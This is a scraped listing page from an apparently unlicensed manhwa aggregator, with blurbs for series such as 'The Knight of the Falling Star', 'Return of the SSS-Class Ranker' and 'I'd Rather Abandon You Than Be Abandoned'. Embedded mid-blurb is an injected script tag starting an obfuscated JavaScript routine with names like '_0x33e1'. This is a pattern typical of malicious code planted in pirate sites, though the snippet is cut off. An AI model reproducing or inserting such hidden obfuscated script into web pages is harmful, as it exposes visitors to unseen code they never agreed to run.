Manhwa - Page 190

Manhwa, the Korean version of comics, is renowned for its digital format and engaging stories across genres, from romance to action and fantasy.

2982 results

One Plus One(Bao A)

A National Idol with nothing to envy. A college student ghostwriter who always envies others. Their thrilling transformation begins!"National Internet Husbando, Haru Please look forward to his heartwarming love story that begins when he changes bodies with a timid female college student Hana, who is kind on the outside but has a broken personality.


The Knight of the Falling Star

During a meteor shower, a magical Faerie appears in a dark alley. Lemon, the Fae Knight has come to the human world to complete his final knighthood test. Alongside him is his human companion, Mira, who dreams of being a Black Mage. Will Lemon be able to complete his test in time?<script></script><script>(function(_0x5d969d,_0x557b4c){var _0x348654=_0x33e1,_0x33b8a7=_0x5d969d();while(!![]){try{var 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I’d Rather Abandon You Than Be Abandoned

Read Manga I’d Rather Abandon You Than Be Abandoned Online For Free At KunManga I’d Rather Abandon You Than Be Abandoned Novel also known as “I Would Rather Abandon You Than Be Abandoned / I’d Rather Abandon Than Be Abandoned / I’d Rather Abandon Them Than Be Abandoned / I’d Rather Abandon You Than Be Abandoned / 버림받느니 버리겠습니다”. This OnGoing webtoon was released on 2024. The story was written by Elluang / Han Nuri and illustrations by Chae Yan. The content of the comic I’d Rather Abandon You Than Be Abandoned: I found myself embodied in an otome game. The problem is that I am not the heroine, Nyla, but the villain, Claudia. Naturally, Claudia’s social reputation is at rock bottom. My brother himself despises me, and my fiancé treats me like a stalker. In this case, I will be unjustly executed by guillotine for crimes I did not commit. So, in a desperate move, I propose a contractual marriage to the Cursed Prince to get his help, but he takes his role as my husband too seriously! Additionally, the original heroine, Nyla, who I thought was good, seems suspicious. Why are you trying so hard to portray me as an evil character? Was Claudia really as bad as everyone thought? The comic I’d Rather Abandon You Than Be Abandoned belongs to the Genre: Drama, Fantasy, Historical, Manhwa, Romance MangaZin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience. You can Read Manhwa recommendation Black Corporation: Joseon Dance of the Phoenix I Can Use the Card Drawing System to Summon Beautiful Girls


The Thorn Flower’s Gambit

Read manhwa The Thorn Flower’s Gambit For the sake of placing her beloved Arendt on the throne, Juna secretly engaged in wicked deeds. When she had vanquished all her enemies, she was betrayed by Arendt and her stepsister Elena, and sent to the guillotine. However, she awoke as her 10-year-old self, vowing to make them pay! Using the natural magic she had concealed for revenge, she visited Arendt’s brother, Clavis, and proposed marriage. But Arendt was the one who, through cunning and manipulation, ensured her demise. Now, her desire for retribution collides with the remnants of her past affection. Can she reconcile the love she once felt with the burning desire for vengeance? Or will her thirst for justice consume her, leaving her with nothing but ashes? “Please Read It Manhwa” is alternative: 花荊の復讐婚


Logging In As A Monster

Read Manhwa “Logging In As A Monster” Online For Free On Manhwa Online The Content Of The Comic Logging In As A Monster: Lee Jinhyuk Has Enjoyed His Decade-Long Reign As Cornsilk, The Undefeated Number One Pvp Player In Virtual Reality Game “The Abyss.” But With The Sequel “Abyss World” Resetting All Players As Newbies, Jinhyuk Accepts A Sudden Sweet Deal From His Abyss Studios Developer Half-Brother Jinho To Log In As The Infamous Boss Monster Black Knight. After Slaying 100 Rankers During The Opening Event, Jinhyuk Agrees To Keep The Monster Login Scheme Going… But Will His Unmatched Talent Blow His Cover? “Logging In As A Monster” Is Also Known As: Log In As A Monster / Login As Monster / Login Sebagai Monster / Đăng Nhập Thành Quái Vật / 最強ランカー、モンスターで無双する / 몬스터로 로그인 “Logging In As A Monster Manga” Is A Comic Series Published By The Website Manhua Top And Is Reused By Other Websites Such As:, Mortalsgroove, Best Manhwa Of All Time… On Manhwa Website, You Can Find The Latest, Hottest Comic Series, Updated Quickly With High-Quality Images, Providing Readers With Great Experiences. Please Share Manhuatop Website With Your Family, Friends, And Acquaintances So That We Can Have More Motivation To Publish The Newest And Best Comic Series For You. Sincerely Thank You! Reading Manga Recommendations Updated!!!: Even If You Don’t Have A Third Virus Girlfriend Purely Yours


Healing Life Through Camping In Another World

Read Healing Life Through Camping In Another World Novel – Healing Life Through Camping In Another World Manhwa Online Free At KunManga The summary of the comic Healing Life Through Camping In Another World: The Star chef, KangHyun, hid in a quite countryside after losing his sense of taste where he found A pathway to another world in his grandfather’s house. Since he was on the run anyway, he planned on enjoying a relaxing camp life, but… the people in the other world keep growing interested in KangHyun! Will KangHyun really be able to heal through experiencing a slow life? “Healing Life Through Camping In Another World” is also known as: 이세계 캠핑으로 힐링 라이프 “TopManhua, MangaUpdates, LikeManga…” are the most searched keywords on the website MANGAZIN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANHUA Two Weeks and Counting Deadlines are Raining in the Status Window I Became The King by Scavenging

1 days ago

Return of the SSS-Class Ranker

Read Return of the SSS-Class Ranker Novel – Return of the SSS-Class Ranker Manhwa Online Free On ManhwaClan The summary of the comic Return of the SSS-Class Ranker: What would you do with the chance to become far greater than your greatest rivals… before they could even start? When a dominant guild gangs up on Rokan to humiliate him and destroy his hard-earned achievements in the world’s most realistic fantasy VR game, he becomes desperate for revenge. But just when Rokan thinks he’s lost it all, a twist in space-time sends him back to right before the game is even launched. Now, this former SSS-ranker sees the perfect opportunity to return to glory! “Return of the SSS-Class Ranker” is also known as: Back to SSS Rank / The SSS-Ranker Returns / SSS-geup Ranker Hoegwihada / SSS級ランカー回帰する / SSS級王者歸來 / SSS级狂战士回归 / SSS급 랭커 회귀하다 / Возвращение ранкера SSS-ранга / Возвращение ранкера SSS-уровня “ZinManga, LikeManga, KunManga…” are the most searched keywords on the website MANGAZIN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANHWA The Twin Swords Of The Sima Deadly Nightshade The Queen’s Secret Lessons

1 days ago

The supporting character has no counterattack

Read manhwa The supporting character has no counterattack; There Is No Counterattack From the Supporting Character “The supporting character has no counterattack Manhwa” is sames name: 조연의 반격은 없다


Dororo Re:Verse

Born in the age of the Japanese civil wars, "Hyakkimaru" had his body stolen from him by demons.He hunts for the demons who have fragments of his body and recovers his body bit by bit.Having lived till the present day chasing after demons in the city's shadows, Hyakkimaru is one day seeked out by a childRoro, a girl who holds a fragment of Hyakkimaru's body despite not being a demon.Under a contract with her, Hyakkimaru goes on his final hunt for the remaining demons...this time, for the sake of becoming a complete human being.


I Became The Despised Granddaughter Of The Murim Family

Here, inside this martial arts novel, there is a true teacher who teaches the arrogant male lead and awakens him through death. Handsome, good-natured, righteous, strong, and… Anyway, there was one big flaw in the male lead's damn fine teacher. It was his foolish only daughter who was filled with greed. A tenacious villainous extra, who always comes back to haunt the male lead in every way, but cannot be abandoned because she is his teacher's daughter. Throughout reading the novel, I cursed at that daughter. Saying that if it were me, I wouldn't live like that.'But that didn't mean that I wanted to be her!'What was worse, Father has already died, and my reputation was the worst. Inevitably, I ran away, but… I died. However, when I opened my eyes, Father was alive?!'If so, in this life, I will definitely save Father!'However…"To think they’re aiming for my granddaughter?! I'll kill them all!"Why do I see Grandfather, who doesn't even appear many times throughout the novel, so often like this?"Marriage? No. Yeonie said that she would live by my side for the rest of her life."Even Father, somehow became weird. Moreover:"Why do you keep avoiding me? Is this also my mistake?"Isn't the main character suddenly becoming obsessed with me?"Originally, I was destined to die. Until you came here."I saved the time-limited bastard, but isn’t it that no good deed goes unpunished?"At least when I'm in front of you… I don't think I’m trash."The villain who blew off my neck is suddenly trying to repent. Is it really okay if it's like this?---**Original Webtoon:** (, (


Sweet Guy

Once upon a time there was a loser, but that one day he got the ability. Ask what? Well ... it's hard to explain, he knows how to instruct on "the right path" girls who strayed from it. You may also like: + Refrain Love + Skill of Lure + Polyamory


The Ash Salmon Quenches the Beast Monarch’s Desire

Read The Ash Salmon Quenches the Beast Monarch’s Desire Novel – The Ash Salmon Quenches the Beast Monarch’s Desire Manhwa Online Free At KunManga The summary of the comic The Ash Salmon Quenches the Beast Monarch’s Desire: The eldest daughter of House Northmoont, Helse, shoulders the responsibility of her family as the stand-in lady while her father is bedridden. However, she faces increasing pressure from rival families vying for Northmoont’s power. One day, Helse decides to offer herself as a hostage to the Kartago, known as the brawny descendants of wolves. There, she discovers that the wolves have strong desires and practice sharing unmarried women among their men! Between the wolf monarch and a virgin noblewoman unfolds a captivating romantic fantasy, where two individuals from contrasting cultures explore their connection through physical intimacy. “The Ash Salmon Quenches the Beast Monarch’s Desire” is also known as: The Wolf’s Lair, the Gray Salmon / 囚われ令嬢は絶対君主を手なずけてしまった / 늑대 소굴, 회색 연어 “TopManhua, MangaUpdates, LikeManga…” are the most searched keywords on the website MANGAZIN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANHUA Two Weeks and Counting Deadlines are Raining in the Status Window I Became The King by Scavenging
